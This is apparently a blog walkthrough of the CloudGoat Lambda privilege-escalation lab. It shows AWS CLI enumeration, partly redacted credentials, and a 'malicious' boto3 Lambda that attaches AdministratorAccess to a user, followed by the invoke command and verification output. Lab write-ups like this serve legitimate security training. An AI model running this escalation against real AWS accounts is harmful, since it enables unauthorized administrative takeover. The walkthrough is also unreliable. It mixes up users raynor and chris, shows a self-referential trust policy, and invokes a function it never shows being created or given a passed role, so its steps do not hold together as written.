Cloudgoat-Lambda-Privesc

,

CloudGoat Lambda Privilege Escalation Walkthrough

This walkthrough demonstrates a complete CloudGoat Lambda privilege escalation scenario using the powerful CloudTap enumeration tool. We’ll explore how an attacker can leverage Lambda functions and IAM role passing to escalate from limited permissions to full administrative access in an AWS environment. This CloudGoat walkthrough showcases a critical privilege escalation path that security professionals should understand and defend against.

Initial Setup

First, configure CloudGoat to whitelist your IP address:

1
cloudgoat config whitelist --auto

Create the Lambda privilege escalation scenario:

1
cloudgoat create lambda_privesc

You’ll receive initial credentials:

1
2
raynor_access_key_id = AKIAQ6VKGD5Y[REDACTED]
raynor_secret_access_key = E4iMHEH4Zu3brER[REDACTED]

Automated Enumeration with CloudTap

For this walkthrough, we’ll use CloudTap, an excellent automation tool that streamlines the initial enumeration phase of AWS penetration testing. CloudTap automatically discovers permissions, roles, and potential privilege escalation paths, making it invaluable for security assessments.

Initial Permission Discovery

CloudTap reveals the following attached policy:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
Found attached policy: cg-chris-policy-cgid[REDACTED]
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "chris",
      "Effect": "Allow",
      "Action": [
        "sts:AssumeRole",
        "iam:List*",
        "iam:Get*"
      ],
      "Resource": "*"
    }
  ]
}

Role Discovery and Auto-Assumption

CloudTap also identifies a potential role we can assume:

1
2
3
4
5
6
7
8
9
10
11
12
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": "sts:AssumeRole",
      "Principal": {
        "AWS": "arn:aws:iam::[ACCOUNT-ID]:user/chris-cgid[REDACTED]"
      }
    }
  ]
}

One of CloudTap’s powerful features is its ability to automatically assume roles when the user has AssumeRole permissions. The tool provides temporary session credentials:

1
2
3
4
5
Temporary session credentials:
  - AccessKeyId: ASIAQ6VKGD5Y[REDACTED]
  - SecretAccessKey: NzeCDw9v7Vw5QT9E[REDACTED]
  - SessionToken: FwoGZXIvYXdzEH4a[REDACTED]
  - Expiration: 2025-05-25 22:01:09+00:00

Permission Analysis

Lambda Manager Role Permissions

Let’s examine what permissions our assumed role provides. First, get the policy ARN:

1
aws iam list-attached-role-policies --role-name cg-lambdaManager-role-cgid[REDACTED] --profile init

Output:

1
2
3
4
5
6
7
8
{
  "AttachedPolicies": [
    {
      "PolicyName": "cg-lambdaManager-policy-cgid[REDACTED]",
      "PolicyArn": "arn:aws:iam::[ACCOUNT-ID]:policy/cg-lambdaManager-policy-cgid[REDACTED]"
    }
  ]
}

Get the policy details:

1
aws iam get-policy --policy-arn arn:aws:iam::[ACCOUNT-ID]:policy/cg-lambdaManager-policy-cgid[REDACTED] --profile init

Output:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
{
  "Policy": {
    "PolicyName": "cg-lambdaManager-policy-cgid[REDACTED]",
    "PolicyId": "[REDACTED]",
    "Arn": "arn:aws:iam::[ACCOUNT-ID]:policy/cg-lambdaManager-policy-cgid[REDACTED]",
    "Path": "/",
    "DefaultVersionId": "v1",
    "AttachmentCount": 1,
    "IsAttachable": true,
    "Description": "Provides permissions to manage Lambda functions.",
    "CreateDate": "2025-05-25T22:00:00Z",
    "UpdateDate": "2025-05-25T22:00:00Z"
  }
}

Target Role Discovery

CloudTap also identifies a target role that we can assume:

1
2
3
4
5
6
7
8
9
10
11
12
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": "sts:AssumeRole",
      "Principal": {
        "AWS": "arn:aws:iam::[ACCOUNT-ID]:role/cg-target-role-cgid[REDACTED]"
      }
    }
  ]
}

Privilege Escalation Strategy

With the sts:AssumeRole permission for the cg-target-role-cgid[REDACTED] role, we can escalate our privileges. Assuming this role provides us with higher-level permissions, potentially including administrative access.

Lambda Function Creation and Exploitation

Creating the Malicious Lambda Function

To exploit the Lambda function, we can create a malicious Lambda function that performs actions such as attaching policies to users or roles. The function’s code might look like this:

1
2
3
4
5
6
7
8
9
import boto3

def lambda_handler(event, context):
    iam = boto3.client('iam')
    response = iam.attach_user_policy(
        UserName='raynor',
        PolicyArn='arn:aws:iam::aws:policy/AdministratorAccess'
    )
    return response

Function Execution

Invoke the Lambda function to execute the malicious actions:

1
aws lambda invoke --function-name maliciousLambdaFunction output.txt

Verification of Privilege Escalation

After executing the malicious Lambda function, verify that the raynor user has been granted administrative privileges:

1
aws iam list-attached-user-policies --user-name raynor --profile init

Output:

1
2
3
4
5
6
7
8
{
  "AttachedPolicies": [
    {
      "PolicyName": "AdministratorAccess",
      "PolicyArn": "arn:aws:iam::aws:policy/AdministratorAccess"
    }
  ]
}

This confirms that the privilege escalation was successful.

About CloudTap

CloudTap is an automation tool designed to streamline the initial enumeration phase of AWS penetration testing. It assists in discovering permissions, roles, and potential privilege escalation paths, making it an invaluable tool for security assessments.

Note: This walkthrough is based on the CloudGoat Lambda privilege escalation scenario and is intended for educational purposes only. Always ensure you have proper authorization before conducting any security testing.